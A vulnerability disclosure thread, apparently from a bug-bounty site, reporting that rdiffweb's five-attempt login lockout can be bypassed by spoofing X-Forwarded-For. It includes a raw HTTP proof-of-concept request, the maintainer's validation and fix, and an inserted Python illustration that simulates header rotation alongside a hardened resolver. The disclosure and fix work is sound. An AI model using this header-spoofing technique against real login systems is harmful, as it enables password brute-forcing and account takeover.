Bypass IP detection to brute-force password in ikus060/rdiffweb


Reported on

Sep 14th 2022


In the login API, by default, the IP address is blocked when the user fails to log in more than 5 times, but we can bypass this mechanism by abusing the X-Forwarded-For header to bypass IP detection and perform a password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: // Change IP
Connection: close


Video POC


This vulnerability allows the attacker to brute-force the admin's password, perform a denial of service attack, ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago
ikus060/rdiffweb maintainer has acknowledged this report a year ago
Patrik Dufresne
a year ago


@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy, the X-Forward-* headers get replaced by apache or nginx. In that case the vulnerability is not reproducible.
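The two positions in this thread (the report's header-driven bypass, and the maintainer's point that a reverse proxy overwrites the header) come down to where the client IP is taken from. The following is an added illustration, not rdiffweb's own code: a constructed lockout counter with the threshold of 5 from the report, a resolver that trusts X-Forwarded-For from anyone, and a hardened resolver that honours it only from an assumed trusted proxy range.

```python
# Added illustration, not rdiffweb's own code: an IP-keyed login lockout
# is defeated when X-Forwarded-For is trusted from anyone; trusting it only
# from a known reverse proxy (the maintainer's deployment) restores it.
import ipaddress
from collections import defaultdict

MAX_FAILURES = 5  # the report's threshold: lock the IP after 5 bad logins
# Assumed, constructed value: the only hop allowed to set X-Forwarded-For.
TRUSTED_PROXIES = (ipaddress.ip_network("10.0.0.0/8"),)

def client_ip_naive(remote_addr, headers):
    """Flawed: the client picks its own identity, so the counter never fills."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip_hardened(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then use the rightmost entry (the one that proxy appended); left-hand
    entries may still be attacker-supplied. Assumes a single proxy hop."""
    if not any(ipaddress.ip_address(remote_addr) in net for net in trusted):
        return remote_addr
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[-1].strip() if xff else remote_addr

class LoginLimiter:
    """Counts failed logins per derived client IP, blocks after MAX_FAILURES."""

    def __init__(self, resolver):
        self.resolver = resolver
        self.failures = defaultdict(int)

    def attempt(self, remote_addr, headers, password_ok):
        ip = self.resolver(remote_addr, headers)
        if self.failures[ip] >= MAX_FAILURES:
            return "blocked"
        if password_ok:
            self.failures[ip] = 0
            return "ok"
        self.failures[ip] += 1
        return "failed"

def guesses_reaching_check(limiter, attacker_addr, attempts):
    """One host rotates X-Forwarded-For per guess (constructed addresses);
    returns how many guesses were actually checked against the password."""
    checked = 0
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"203.0.113.{i}"}
        if limiter.attempt(attacker_addr, headers, password_ok=False) == "failed":
            checked += 1
    return checked
```

With the naive resolver every rotated header value starts a fresh counter, so all guesses reach the password check; with the hardened resolver a direct client is keyed on its real address and stops after 5.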

a year ago


In the demo video I'm doing the attack right on the site itself; while the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability a year ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
a year ago


@co0k13-cypher Could you please change the affected version to 2.4.2 and earlier?

Patrik Dufresne marked this as fixed in 2.4.4 with commit 28258e a year ago
Patrik Dufresne has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


I'm sorry, the report was closed so I can't edit!

Patrik Dufresne
a year ago


@admin Could you help to change the affected version to 2.4.2 and earlier?

Jamie Slome
a year ago


Sorted :)
